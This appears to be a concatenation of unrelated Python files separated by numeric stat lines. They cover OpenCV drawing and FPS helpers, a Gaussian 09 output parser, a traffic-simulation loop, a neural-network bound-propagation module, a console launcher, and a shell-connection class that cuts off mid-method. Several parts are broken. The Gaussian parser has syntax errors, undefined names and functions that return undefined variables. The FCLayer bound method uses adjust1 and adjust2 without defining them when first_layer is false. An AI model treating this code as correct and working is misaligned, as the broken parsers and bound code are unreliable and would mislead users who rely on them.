def cornerRect(img, bbox, l=30, t=5, rt=1,
colorR=(255, 0, 255), colorC=(0, 255, 0)):
"""
:param img: Image to draw on.
:param bbox: Bounding box [x, y, w, h]
:param l: length of the corner line
:param t: thickness of the corner line
:param rt: thickness of the rectangle
:param colorR: Color of the Rectangle
:param colorC: Color of the Corners
:return:
"""
x, y, w, h = bbox
x1, y1 = x + w, y + h
if rt != 0:
cv2.rectangle(img, bbox, colorR, rt)
# Top Left x,y
cv2.line(img, (x, y), (x + l, y), colorC, t)
cv2.line(img, (x, y), (x, y + l), colorC, t)
# Top Right x1,y
cv2.line(img, (x1, y), (x1 - l, y), colorC, t)
cv2.line(img, (x1, y), (x1, y + l), colorC, t)
# Bottom Left x,y1
cv2.line(img, (x, y1), (x + l, y1), colorC, t)
cv2.line(img, (x, y1), (x, y1 - l), colorC, t)
# Bottom Right x1,y1
cv2.line(img, (x1, y1), (x1 - l, y1), colorC, t)
cv2.line(img, (x1, y1), (x1, y1 - l), colorC, t)
return img
def findContours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=True, c=(255, 0, 0)):
"""
Finds Contours in an image
:param img: Image on which we want to draw
:param imgPre: Image on which we want to find contours
:param minArea: Minimum Area to detect as valid contour
:param sort: True will sort the contours by area (biggest first)
:param filter: Filters based on the corner points e.g. 4 = Rectangle or square
:param drawCon: draw contours boolean
:return: Foudn contours with [contours, Area, BoundingBox, Center]
"""
conFound = []
imgContours = img.copy()
contours, hierarchy = cv2.findContours(
imgPre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > minArea:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)
# print(len(approx))
if len(approx) == filter or filter == 0:
if drawCon:
cv2.drawContours(imgContours, cnt, -1, c, 3)
x, y, w, h = cv2.boundingRect(approx)
cx, cy = x + (w // 2), y + (h // 2)
cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)
cv2.circle(imgContours, (x + (w // 2),
y + (h // 2)), 5, c, cv2.FILLED)
conFound.append({"cnt": cnt, "area": area, "bbox": [
x, y, w, h], "center": [cx, cy]})
if sort:
conFound = sorted(conFound, key=lambda x: x["area"], reverse=True)
return imgContours, conFound
def overlayPNG(imgBack, imgFront, pos=[0, 0]):
hf, wf, cf = imgFront.shape
hb, wb, cb = imgBack.shape
*_, mask = cv2.split(imgFront)
maskBGRA = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGRA)
maskBGR = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
imgRGBA = cv2.bitwise_and(imgFront, maskBGRA)
imgRGB = cv2.cvtColor(imgRGBA, cv2.COLOR_BGRA2BGR)
imgMaskFull = np.zeros((hb, wb, cb), np.uint8)
imgMaskFull[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = imgRGB
imgMaskFull2 = np.ones((hb, wb, cb), np.uint8) * 255
maskBGRInv = cv2.bitwise_not(maskBGR)
imgMaskFull2[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = maskBGRInv
imgBack = cv2.bitwise_and(imgBack, imgMaskFull2)
imgBack = cv2.bitwise_or(imgBack, imgMaskFull)
return imgBack
def rotateImage(img, angle, scale=1):
h, w = img.shape[:2]
center = (w / 2, h / 2)
rotate_matrix = cv2.getRotationMatrix2D(
center=center, angle=angle, scale=scale)
img = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(w, h))
return img
class ColorFinder:
"""
Finds color in an image based on hsv values
Can run as stand alone to find relevant hsv values
"""
def __init__(self, trackBar=False):
self.trackBar = trackBar
if self.trackBar:
self.initTrackbars()
def empty(self, a):
pass
def initTrackbars(self):
"""
To intialize Trackbars . Need to run only once
"""
cv2.namedWindow("TrackBars")
cv2.resizeWindow("TrackBars", 640, 240)
cv2.createTrackbar("Hue Min", "TrackBars", 0, 179, self.empty)
cv2.createTrackbar("Hue Max", "TrackBars", 179, 179, self.empty)
cv2.createTrackbar("Sat Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Sat Max", "TrackBars", 255, 255, self.empty)
cv2.createTrackbar("Val Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Val Max", "TrackBars", 255, 255, self.empty)
def getTrackbarValues(self):
"""
Gets the trackbar values in runtime
:return: hsv values from the trackbar window
"""
hmin = cv2.getTrackbarPos("Hue Min", "TrackBars")
smin = cv2.getTrackbarPos("Sat Min", "TrackBars")
vmin = cv2.getTrackbarPos("Val Min", "TrackBars")
hmax = cv2.getTrackbarPos("Hue Max", "TrackBars")
smax = cv2.getTrackbarPos("Sat Max", "TrackBars")
vmax = cv2.getTrackbarPos("Val Max", "TrackBars")
hsvVals = {"hmin": hmin, "smin": smin, "vmin": vmin,
"hmax": hmax, "smax": smax, "vmax": vmax}
print(hsvVals)
return hsvVals
def update(self, img, myColor=None):
"""
:param img: Image in which color needs to be found
:param hsvVals: List of lower and upper hsv range
:return: (mask) bw image with white regions where color is detected
(imgColor) colored image only showing regions detected
"""
imgColor = [],
mask = []
if self.trackBar:
myColor = self.getTrackbarValues()
if isinstance(myColor, str):
myColor = self.getColorHSV(myColor)
if myColor is not None:
imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower = np.array(
[myColor['hmin'], myColor['smin'], myColor['vmin']])
upper = np.array(
[myColor['hmax'], myColor['smax'], myColor['vmax']])
mask = cv2.inRange(imgHSV, lower, upper)
imgColor = cv2.bitwise_and(img, img, mask=mask)
return imgColor, mask
def getColorHSV(self, myColor):
if myColor == 'red':
output = {'hmin': 146, 'smin': 141, 'vmin': 77,
'hmax': 179, 'smax': 255, 'vmax': 255}
elif myColor == 'green':
output = {'hmin': 44, 'smin': 79, 'vmin': 111,
'hmax': 79, 'smax': 255, 'vmax': 255}
elif myColor == 'blue':
output = {'hmin': 103, 'smin': 68, 'vmin': 130,
'hmax': 128, 'smax': 255, 'vmax': 255}
else:
output = None
logging.warning("Color Not Defined")
logging.warning("Available colors: red, green, blue ")
return output
class FPS:
"""
Helps in finding Frames Per Second and display on an OpenCV Image
"""
def __init__(self):
self.pTime = time.time()
def update(self, img=None, pos=(20, 50), color=(255, 0, 0), scale=3, thickness=3):
"""
Update the frame rate
:param img: Image to display on, can be left blank if only fps value required
:param pos: Position on the FPS on the image
:param color: Color of the FPS Value displayed
:param scale: Scale of the FPS Value displayed
:param thickness: Thickness of the FPS Value displayed
:return:
"""
cTime = time.time()
try:
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
if img is None:
return fps
else:
cv2.putText(img, f'FPS: {int(fps)}', pos, cv2.FONT_HERSHEY_PLAIN,
scale, color, thickness)
return fps, img
except:
return 0
class LivePlot:
"""
Live Plotting Graphs
Can be used for PID tuning, Simple Trigonometric Plots, etc.
"""
def __init__(self, w=640, h=480, yLimit=[0, 100],
interval=0.001, invert=False, char=' '):
self.yLimit = yLimit
self.w = w
self.h = h
self.invert = invert
self.interval = interval
self.char = char[0]
self.imgPlot = np.zeros((self.h, self.w, 3), np.uint8)
self.imgPlot[:] = 225, 225, 225
cv2.rectangle(self.imgPlot, (0, 0),
(self.w, self.h),
(0, 0, 0), cv2.FILLED)
self.xP = 0
self.yP = 0
self.yList = []
self.xList = [x for x in range(0, 100)]
self.ptime = 0
def update(self, y):
if time.time() - self.ptime > self.interval:
# Refresh
self.imgPlot[:] = 225, 225, 225
# Draw Static Parts
self.drawBackground()
# Draw the text value
cv2.putText(self.imgPlot, str(y),
(self.w - (125), 50), cv2.FONT_HERSHEY_PLAIN,
3, (150, 150, 150), 3)
if self.invert:
self.yP = int(np.interp(y, self.yLimit,
[self.h, 0]))
else:
self.yP = int(np.interp(y, self.yLimit,
[0, self.h]))
self.yList.append(self.yP)
if len(self.yList) == 100:
self.yList.pop(0)
for i in range(0, len(self.yList)):
if i < 2:
pass
else:
cv2.line(self.imgPlot, (int((self.xList[i - 1] * (self.w // 100))) - (self.w // 10),
self.yList[i - 1]),
(int((self.xList[i] * (self.w // 100)) - (self.w // 10)),
self.yList[i]), (255, 0, 255), 2)
self.ptime = time.time()
return self.imgPlot
def drawBackground(self):
# Draw Background Canvas
cv2.rectangle(self.imgPlot, (0, 0),
(self.w, self.h),
(0, 0, 0), cv2.FILLED)
# Center Line
cv2.line(self.imgPlot, (0, self.h // 2),
(self.w, self.h // 2), (150, 150, 150), 2)
# Draw Grid Lines
for x in range(0, self.w, 50):
cv2.line(self.imgPlot, (x, 0), (x, self.h),
(50, 50, 50), 1)
for y in range(0, self.h, 50):
cv2.line(self.imgPlot, (0, y), (self.w, y),
(50, 50, 50), 1)
# Y Label
cv2.putText(self.imgPlot, f'{int((self.h - y) * (self.yLimit[1] / self.h))}',
(10, y), cv2.FONT_HERSHEY_PLAIN,
1, (150, 150, 150), 1)
cv2.putText(self.imgPlot, self.char,
(self.w - 100, self.h - 25), cv2.FONT_HERSHEY_PLAIN,
5, (150, 150, 150), 5)
def putTextRect(img, text, pos, scale=3, thickness=3, colorT=(255, 255, 255),
colorR=(255, 0, 255), font=cv2.FONT_HERSHEY_PLAIN,
offset=10, border=None, colorB=(0, 255, 0)):
"""
Creates Text with Rectangle Background
:param img: Image to put text rect on
:param text: Text inside the rect
:param pos: Starting position of the rect x1,y1
:param scale: Scale of the text
:param thickness: Thickness of the text
:param colorT: Color of the Text
:param colorR: Color of the Rectangle
:param font: Font used. Must be cv2.FONT....
:param offset: Clearance around the text
:param border: Outline around the rect
:param colorB: Color of the outline
:return: image, rect (x1,y1,x2,y2)
"""
ox, oy = pos
(w, h), _ = cv2.getTextSize(text, font, scale, thickness)
x1, y1, x2, y2 = ox - offset, oy + offset, ox + w + offset, oy - h - offset
cv2.rectangle(img, (x1, y1), (x2, y2), colorR, cv2.FILLED)
if border is not None:
cv2.rectangle(img, (x1, y1), (x2, y2), colorB, border)
cv2.putText(img, text, (ox, oy), font, scale, colorT, thickness)
return img, [x1, y2, x2, y1]
| 14,019 | 5,329 |
"""
Library of functions to retrieve frequency information from a Gaussian 09e output file.
Frequencies currently supported:
(1) Harmonic Vibrational Frequencies
(2) Harmonic Zero-Point Vibrational Energy
"""
__authors__ = "Kevin Moore, Andreas Copan"
__updated__ = "2019-01-15"
from ..rere import parse as repar
from ..rere import find as ref
from ..rere import pattern as rep
from ..rere import pattern_lib as relib
from ... import params
##### Series of functions to read the frequency information #####
def harm_vib_freqs_reader(output_string):
""" Reads the harmonic vibrational frequencies from the output file.
Returns the frequencies as a list of floats in cm-1.
"""
harm_vib_freq_pattern = (
'Frequencies --' +
rep.one_or_more(relib.WHITESPACE) +
rep.capturing(
rep.one_or_more(relib.FLOAT +
rep.one_or_more(relib.WHITESPACE))
)
)
# Obtain the frequencies for all degrees-of-freedom
all_freqs = repar.list_float(harm_vib_freq_pattern, output_string)
# Remove the zero frequencies
vib_freqs = [freq for freq in all_freqs if freq != 0.0]
freqs = []
lines = lines.splitlines()
key = 'Fundamental Bands (DE w.r.t. Ground State)'
iline = io.get_line_number(key,lines=lines)
if iline > 0:
for i in range(nfreq):
iline += 1
line = lines[iline]
cols = line.split()
freqs.append(cols[-5])
return vib_freqs
def harm_zpve_reader(output_string):
""" Reads the harmonic zero-point vibrational energy (ZPVE) from the output file.
Returns the ZPVE as a float; in Hartrees.
"""
harm_zpve_pattern_1 = (
'Zero-point correction=' +
rep.one_or_more(relib.WHITESPACE) +
rep.one_or_more(relib.FLOAT)
'(Hartree/Particle)'
)
return harm_zpve
def anharm_zpve_reader(output_string):
""" Reads the anharmonic zero-point vibrational energy (ZPVE) from the output file.
Returns the ZPVE as a float; in Hartrees.
"""
anharm_zpve_pattern = (
'ZPE(harm) =' +
FLOAT +
D-02 +
'KJ/mol' +
'ZPE(anh) =' +
FLOAT +
D-02 +
'KJ/mol'
)
return anharm_zpve
##### Dictionary of functions to read frequency information in the files #####
FREQUENCY_READERS = {
params.FREQUENCY.HARM_FREQ : harm_vib_freqs_reader,
params.FREQUENCY.HARM_ZPVE : harm_zpve_reader
params.FREQUENCY.ANHARM_ZPVE : anharm_zpve_reader
}
#def gaussian_rotdists (lines):
# startkey = 'Quartic Centrifugal Distortion Constants Tau Prime'
# endkey = 'Asymmetric Top Reduction'
# lines = lines.splitlines()
# sline = io.get_line_number(startkey,lines=lines)
# if sline < 0:
# return ''
# lines = lines[sline+3:sline+9]
# distlines = []
# for line in lines:
# splitline = line.split()
# if splitline[0] == 'TauP':
# distlines.append('\t'.join(splitline[1:3]))
# else:
# break
# constants = '\n'.join(distlines).replace('D','e')
# return constants
#
#def gaussian_vibrot(lines):
# startkey = 'Vibro-Rot alpha Matrix (in cm^-1)'
# ndof = gaussian_nfreq(lines)
# lines = lines.splitlines()
# sline = io.get_line_number(startkey,lines=lines)
# if sline < 0:
# return ''
# lines = lines[sline+3:sline+3+ndof]
# for i in range(len(lines)):
# if ')' in lines[i]:
# lines[i] = lines[i].split(')')[1]
# if ndof < 2:
# lines[i] = '\t'.join(lines[i].split()[:-1])
# mat = '\n'.join(lines).split('---------------')[0]
# return mat
| 3,664 | 1,340 |
import time
import sys
from graphics import GraphApp, GraphWin, Text, Point, _root
from menu import MainMenu
from graphs import Graph, ShortestPaths
from maps import RoadMap
from cars import Car, CarShape, CarFactory
from gps import GPS
from info_window import InfoWindow, RoadInfoWindow
from collision import GridCollisionSystem, QuadTreeCollisionSystem
from latlon import LatLonConverter
from openstreetmap import query_roads_by_lat_lon, save_raw_json_map_data
def main():
window.addToParent()
window.setBackground('white')
window.clear()
window.resetView()
secondary_window.addToParent()
secondary_window.setBackground('white')
secondary_window.clear()
road_info_window.setBackground('white')
road_info_window.clear()
config_data = main_menu.config_data
map_data = config_data["map_data"]
S = map_data["coords_south"]
W = map_data["coords_west"]
N = map_data["coords_north"]
E = map_data["coords_east"]
llc = LatLonConverter(window, S, W, N, E)
graph = Graph()
graph.load_open_street_map_data(map_data["filename"], llc)
road_map = RoadMap(graph, window)
road_map.draw()
road_map.draw_road_names()
gps = GPS(graph, road_map)
cars = []
car_shapes = []
car_factory = CarFactory(window, gps, cars, car_shapes)
num_cars = config_data["num_cars"]
for _ in range(num_cars):
car_factory.create()
# collision_system = GridCollisionSystem(window, cars)
collision_system = QuadTreeCollisionSystem(window, cars)
info = InfoWindow(secondary_window)
info.set_selected_car(cars[0])
info.initialize_table()
car_shapes[info.selected_car.index].shape.setFill("yellow")
road_info = RoadInfoWindow(road_info_window)
for car_shape in car_shapes:
car_shape.draw()
# initialize simulation variables
simTime = 0.0
limit = 10000
TICKS_PER_SECOND = 30
TIME_PER_TICK = 1.0/TICKS_PER_SECOND
nextLogicTick = TIME_PER_TICK
lastFrameTime = time.time()
lag = 0.0
# Main Simulation Loop
while simTime < limit:
currentTime = time.time()
elapsed = currentTime - lastFrameTime
lastFrameTime = currentTime
lag += elapsed
simTime += elapsed
# process events
window.update()
secondary_window.update()
road_info_window.update()
frame.update()
last_pressed_key = (
window.checkKey() or
secondary_window.checkKey() or
road_info_window.checkKey()
)
if last_pressed_key is not None:
if last_pressed_key == "space":
pause()
lastFrameTime = time.time()
elif last_pressed_key == "p":
window.zoomIn()
elif last_pressed_key == "o":
window.zoomOut()
elif last_pressed_key == "d":
print(road_map.get_roads_within_view())
last_clicked_pt = window.checkMouse()
if last_clicked_pt is not None:
car_clicked = False
map_obj_clicked = False
for car_shape in car_shapes:
if car_shape.clicked(last_clicked_pt):
car_shapes[info.selected_car.index].shape.setFill("white")
info.set_selected_car(cars[car_shape.index])
car_shapes[info.selected_car.index].shape.setFill("yellow")
car_clicked = True
break
if not car_clicked:
nearby_object_ids = road_map.get_nearby_object_ids(last_clicked_pt.x, last_clicked_pt.y)
for map_obj_id in nearby_object_ids:
map_obj = road_map.get_obj_by_id(map_obj_id)
if map_obj.clicked(last_clicked_pt):
relx, rely = window.getRelativeScreenPos(last_clicked_pt.x, last_clicked_pt.y)
road_info_window_options = {"place": {"relx": relx, "rely": rely}}
road_info_window.addToParent(road_info_window_options)
road_info.set_selected_item(map_obj)
map_obj_clicked = True
break
if not map_obj_clicked:
road_info_window.forget()
last_clicked_pt = secondary_window.checkMouse()
if last_clicked_pt is not None:
secondary_window.update()
for button in info.buttons:
button.clicked(last_clicked_pt)
continue
# update simulation logic
while lag > TIME_PER_TICK:
collision_system.process_collisions(cars)
for car in cars:
car.move_towards_dest(TIME_PER_TICK)
car_shape = car_shapes[car.index]
car_shape.x = cars[car.index].x
car_shape.y = cars[car.index].y
collision_system.update_objects(cars)
nextLogicTick += TIME_PER_TICK
lag -= TIME_PER_TICK
# render updates to window
for car_shape in car_shapes:
car_shape.render()
info.update_table()
if info.follow_car:
window.centerScreenOnPoint(info.selected_car.x, info.selected_car.y)
road_info.update_table()
road_map.draw_route(info.selected_car, info.show_route)
_root.update_idletasks()
cleanup()
def pause():
"""pause until user hits space again"""
cx, cy = window.getCenterScreenPoint()
message = Text(Point(cx, cy), 'Paused')
message.setSize(24)
message.draw(window)
while (
window.checkKey() != "space" and
secondary_window.checkKey() != "space" and
road_info_window.checkKey() != "space"
):
window.update()
secondary_window.update()
road_info_window.update()
message.undraw()
def cleanup():
"""free resources and close window"""
window.close()
secondary_window.close()
road_info_window.close()
frame.close()
sys.exit()
if __name__ == '__main__':
frame = GraphApp("Traffic Simulation")
window_options = {"pack": {"side": "left", "fill": "both", "expand": True}}
window = GraphWin(
"Map Window", 1280, 800, autoflush=False,
new_window=False, master=frame.master, master_options=window_options
)
secondary_window_options = {"place": {"relx": 1, "rely": 0, "anchor": "ne"}}
secondary_window = GraphWin(
"Info Window", 300, 400, autoflush=False, scrollable=False,
new_window=False, master=frame.master, master_options=secondary_window_options
)
road_info_window = GraphWin(
"Road Info Window", 300, 130, autoflush=False, scrollable=False,
new_window=False, master=frame.master, master_options={}
)
hidden_windows = [secondary_window, road_info_window]
main_menu = MainMenu(window, main, hidden_windows=hidden_windows)
menu_options = {"Menu": main_menu.run, "Restart": main, "Exit": cleanup}
frame.addMenu(menu_options)
main()
# TODO
# AI so cars can change lanes without crashing and adjust route based on existing traffic conditions
# add ability for cars to change lanes
# create gui menu so that settings can be changed in the simulation (# of cars, lane closures, etc)
# increase # of cars that can be drawn on the screen at once to: 500 | 1000
# dynamically load additional map data when zooming out or moving camera
| 7,460 | 2,324 |
"""
这个文件修改自原文件,修改内容包括:
1. 删除quadratic algorithm的使用,因为还没想好该怎么用
2. 从原来的单扰动改为多扰动
"""
'''
>>> This file creates modules that can do forward, backward pass as well as bound propagation
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from abc import ABCMeta, abstractmethod
import numpy as np
from .linearize import linearize_relu, linearize_sigd, linearize_tanh, linearize_arctan
from .utility import reduced_m_bm, reduced_bm_bm, reduced_bv_bm, reduced_bm_bv, quad_bound_calc
class Layer(nn.Module, metaclass = ABCMeta):
def __init__(self,):
super(Layer, self).__init__()
@abstractmethod
def forward(self, x):
'''
>>> do forward pass with a given input
'''
raise NotImplementedError
@abstractmethod
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps1 = None, ori_perturb_eps2 = None, first_layer = False):
'''
>>> do bound calculation
>>> l, u: the lower and upper bound of the input, of shape [batch_size, immediate_in_dim]
>>> W_list: the transformation matrix introduced by the previous layers, of shape [batch_size, out_dim, in_dim]
>>> m1_list, m2_list: the bias introduced by the previous layers, of shape [batch_size, in_dim]
>>> ori_perturb_norm, ori_perturb_eps: the original perturbation, default is None
>>> first_layer: boolean, whether or not this layer is the first layer
'''
raise NotImplementedError
class FCLayer(Layer):
def __init__(self, in_features, out_features):
super(FCLayer, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.layer = nn.Linear(in_features, out_features)
def forward(self, x):
return F.linear(x, self.layer.weight, self.layer.bias)
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps1 = None, ori_perturb_eps2 = None, first_layer = False):
batch_size = l.shape[0]
# # quad method
# # if the bias term in the last iteration is the same, we can merge it with the current one
# max_var = torch.max(torch.abs(m1_list[-1] - m2_list[-1]))
# # Update the transition weight matrix
# update_list = W_list if max_var > 1e-4 or ori_perturb_norm != None else W_list[:-1]
# for idx, W in enumerate(update_list):
# W_list[idx] = reduced_m_bm(self.layer.weight, W)
# # Add the contribution of this layer
# if max_var > 1e-4 or ori_perturb_norm != None:
# W_list.append(torch.ones([batch_size, self.out_features], device = self.layer.weight.device))
# m1_list.append(self.layer.bias.unsqueeze(0).repeat(batch_size, 1))
# m2_list.append(self.layer.bias.unsqueeze(0).repeat(batch_size, 1))
# else:
# W_list[-1] = torch.ones([batch_size, self.out_features], device = self.layer.weight.device)
# m1_list[-1] = torch.matmul(m1_list[-1], self.layer.weight.transpose(0, 1)) + self.layer.bias
# m2_list[-1] = torch.matmul(m2_list[-1], self.layer.weight.transpose(0, 1)) + self.layer.bias
# quad_low_bound, quad_up_bound = quad_bound_calc(W_list, m1_list, m2_list, ori_perturb_norm, ori_perturb_eps)
# simp method
if first_layer == True:
primal_norm = ori_perturb_norm
dual_norm = 1. / (1. - 1. / primal_norm)
adjust1 = torch.norm(self.layer.weight.unsqueeze(0) * ori_perturb_eps1.unsqueeze(1), dim = 2, p = dual_norm) # of shape [batch_size, out_dim]
adjust2 = torch.norm(self.layer.weight.unsqueeze(0) * ori_perturb_eps2.unsqueeze(1), dim = 2, p = dual_norm) # of shape [batch_size, out_dim]
else:
adjust = 0.
W_neg = torch.clamp(self.layer.weight, max = 0.)
W_pos = torch.clamp(self.layer.weight, min = 0.)
low_bound = l.matmul(W_pos.t()) + u.matmul(W_neg.t()) - adjust1 + self.layer.bias
up_bound = l.matmul(W_neg.t()) + u.matmul(W_pos.t()) + adjust2 + self.layer.bias
# low_bound = torch.max(quad_low_bound, simp_low_bound)
# up_bound = torch.min(quad_up_bound, simp_up_bound)
return low_bound, up_bound, W_list, m1_list, m2_list
class ReLULayer(Layer):
def __init__(self,):
super(ReLULayer, self).__init__()
def forward(self, x):
return F.relu(x, inplace = True)
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
assert first_layer == False, 'the first layer cannot be ReLU'
batch_size = l.shape[0]
# # quad method
# # Obtain D, m1, m2
# D, m1, m2 = linearize_relu(l, u)
# D = D.reshape(batch_size, -1) # of shape [batch_size, dim]
# m1 = m1.reshape(batch_size, -1) # of shape [batch_size, dim]
# m2 = m2.reshape(batch_size, -1) # of shape [batch_size, dim]
# out_dim = D.shape[1]
# # For potential merge
# max_var = torch.max(torch.abs(m1_list[-1] - m2_list[-1]))
# # Update
# update_list = W_list if max_var > 1e-4 else W_list[:-1]
# for idx, W in enumerate(update_list):
# W_list[idx] = reduced_bm_bm(D, W)
# # Add the contribution of this layer
# if max_var > 1e-4:
# W_list.append(torch.ones([batch_size, out_dim], device = D.device))
# m1_list.append(m1)
# m2_list.append(m2)
# else:
# m1_list[-1] = m1_list[-1] * D + m1
# m2_list[-1] = m2_list[-1] * D + m2
# quad_low_bound, quad_up_bound = quad_bound_calc(W_list, m1_list, m2_list, ori_perturb_norm, ori_perturb_eps)
# simp method
low_bound = F.relu(l, inplace = True)
up_bound = F.relu(u, inplace = True)
# low_bound = torch.max(quad_low_bound, simp_low_bound)
# up_bound = torch.min(quad_up_bound, simp_up_bound)
return low_bound, up_bound, W_list, m1_list, m2_list
class SigdLayer(Layer):
def __init__(self,):
super(SigdLayer, self).__init__()
def forward(self, x):
return F.sigmoid(x)
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
assert first_layer == False, 'the first layer cannot be ReLU'
batch_size = l.shape[0]
# # quad method
# # Obtain D, m1, m2
# D, m1, m2 = linearize_sigd(l, u)
# D = D.reshape(batch_size, -1)
# m1 = m1.reshape(batch_size, -1)
# m2 = m2.reshape(batch_size, -1)
# out_dim = D.shape[1]
# # For potential merge
# max_var = torch.max(torch.abs(m1_list[-1] - m2_list[-1]))
# # Update
# update_list = W_list if max_var > 1e-4 else W_list[:-1]
# for idx, W in enumerate(update_list):
# W_list[idx] = reduced_bm_bm(D, W)
# # Add the contribution of this layer
# if max_var > 1e-4:
# W_list.append(torch.ones([batch_size, out_dim], device = D.device))
# m1_list.append(m1)
# m2_list.append(m2)
# else:
# m1_list[-1] = m1_list[-1] * D + m1
# m2_list[-1] = m2_list[-1] * D + m2
# quad_low_bound, quad_up_bound = quad_bound_calc(W_list, m1_list, m2_list, ori_perturb_norm, ori_perturb_eps)
# simp method
low_bound = F.sigmoid(l)
up_bound = F.sigmoid(u)
# low_bound = torch.max(quad_low_bound, simp_low_bound)
# up_bound = torch.min(quad_up_bound, simp_up_bound)
return low_bound, up_bound, W_list, m1_list, m2_list
class TanhLayer(Layer):
def __init__(self,):
super(TanhLayer, self).__init__()
def forward(self, x):
return torch.tanh(x)
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
assert first_layer == False, 'the first layer cannot be ReLU'
batch_size = l.shape[0]
# # quad method
# # Obtain D, m1, m2
# D, m1, m2 = linearize_tanh(l, u)
# D = D.reshape(batch_size, -1)
# m1 = m1.reshape(batch_size, -1)
# m2 = m2.reshape(batch_size, -1)
# out_dim = D.shape[1]
# # For potential merge
# max_var = torch.max(torch.abs(m1_list[-1] - m2_list[-1]))
# # Update
# update_list = W_list if max_var > 1e-4 else W_list[:-1]
# for idx, W in enumerate(update_list):
# W_list[idx] = reduced_bm_bm(D, W)
# # Add the contribution of this layer
# if max_var > 1e-4:
# W_list.append(torch.ones([batch_size, out_dim], device = D.device))
# m1_list.append(m1)
# m2_list.append(m2)
# else:
# m1_list[-1] = m1_list[-1] * D + m1
# m2_list[-1] = m2_list[-1] * D + m2
# quad_low_bound, quad_up_bound = quad_bound_calc(W_list, m1_list, m2_list, ori_perturb_norm, ori_perturb_eps)
# simp method
low_bound = torch.tanh(l)
up_bound = torch.tanh(u)
# low_bound = torch.max(quad_low_bound, simp_low_bound)
# up_bound = torch.min(quad_up_bound, simp_up_bound)
return low_bound, up_bound, W_list, m1_list, m2_list
class ArctanLayer(Layer):
def __init__(self,):
super(ArctanLayer, self).__init__()
def forward(self, x):
return torch.atan(x)
def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
assert first_layer == False, 'the first layer cannot be ReLU'
batch_size = l.shape[0]
# # quad method
# # Obtain D, m1, m2
# D, m1, m2 = linearize_arctan(l, u)
# D = D.reshape(batch_size, -1)
# m1 = m1.reshape(batch_size, -1)
# m2 = m2.reshape(batch_size, -1)
# out_dim = D.shape[1]
# # For potential merge
# max_var = torch.max(torch.abs(m1_list[-1] - m2_list[-1]))
# # Update
# update_list = W_list if max_var > 1e-4 else W_list[:-1]
# for idx, W in enumerate(update_list):
# W_list[idx] = reduced_bm_bm(D, W)
# # Add the contribution of this layer
# if max_var > 1e-4:
# W_list.append(torch.ones([batch_size, out_dim], device = D.device))
# m1_list.append(m1)
# m2_list.append(m2)
# else:
# m1_list[-1] = m1_list[-1] * D + m1
# m2_list[-1] = m2_list[-1] * D + m2
# quad_low_bound, quad_up_bound = quad_bound_calc(W_list, m1_list, m2_list, ori_perturb_norm, ori_perturb_eps)
# simp method
low_bound = torch.atan(l)
up_bound = torch.atan(u)
# low_bound = torch.max(quad_low_bound, simp_low_bound)
# up_bound = torch.min(quad_up_bound, simp_up_bound)
return low_bound, up_bound, W_list, m1_list, m2_list
| 11,116 | 4,245 |
"""
main.py
----------
"""
import argparse
import os
import runpy
import sys
from . import console
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Description",
)
parser.add_argument(
"source",
nargs="?",
help="""Name of the script to be run as though it was the main module
run by Python, so that __name__ does equal '__main__'.
""",
)
def main():
console_dict = {"exit": lambda: os._exit(1)} # force clean exit from console
args = parser.parse_args()
if args.source is not None:
if sys.flags.interactive:
source = args.source
if source.endswith(".py"):
source = source[:-3]
module_dict = runpy.run_module(source, run_name="__main__")
console_dict.update(module_dict)
console.start_console(local_vars=console_dict)
else:
runpy.run_path(args.source, run_name="__main__")
else:
console.start_console(local_vars=console_dict)
main()
| 1,050 | 318 |
#python Libraries
from StringIO import StringIO
from collections import namedtuple
import Queue
import os
# Third-party Libraries
try:
import pexpect
except ImportError as error:
#print error
pass
# apetools Libraries
from apetools.baseclass import BaseClass
from apetools.commons.errors import ConnectionError
from apetools.commons.readoutput import StandardOutput
from producer import PopenProducer
SPACER = '{0} {1} '
UNKNOWN = "Unknown command: "
EOF = ''
SPACE = " "
OutputError = namedtuple("OutputError", 'output error')
class LocalConnection(BaseClass):
"""
A local connection talks to a local command-line shell.
"""
def __init__(self, command_prefix='', *args, **kwargs):
"""
:param:
- `command_prefix`: A prefix to prepend to commands (e.g. 'adb shell')
"""
super(LocalConnection, self).__init__(*args, **kwargs)
# logger is defined in BaseClass but declared here for child-classes
self._logger = None
self.command_prefix = command_prefix
self._queue = None
return
@property
def queue(self):
"""
:rtype: Queue.Queue
:return: the local Queue
"""
if self._queue is None:
self._queue = Queue.Queue()
return self._queue
def _procedure_call(self, command, arguments='',
path="", timeout=None):
"""
This is provided so it can be overriden by subclasses.
Otherwise it just returns _main()
"""
return self._main(command, arguments, path, timeout)
def _main(self, command, arguments='', path="",
timeout=None):
"""
:param:
- `command`: the command string to execute
- `arguments`: The arguments for the command
- `timeout`: if `block`, wait until timeout for output
:return: OutputError named tuple
"""
try:
command = os.path.join(path, command)
self.logger.debug("Creating PopenProducer")
process = PopenProducer(SPACE.join((self.command_prefix, command, arguments)),
timeout=timeout)
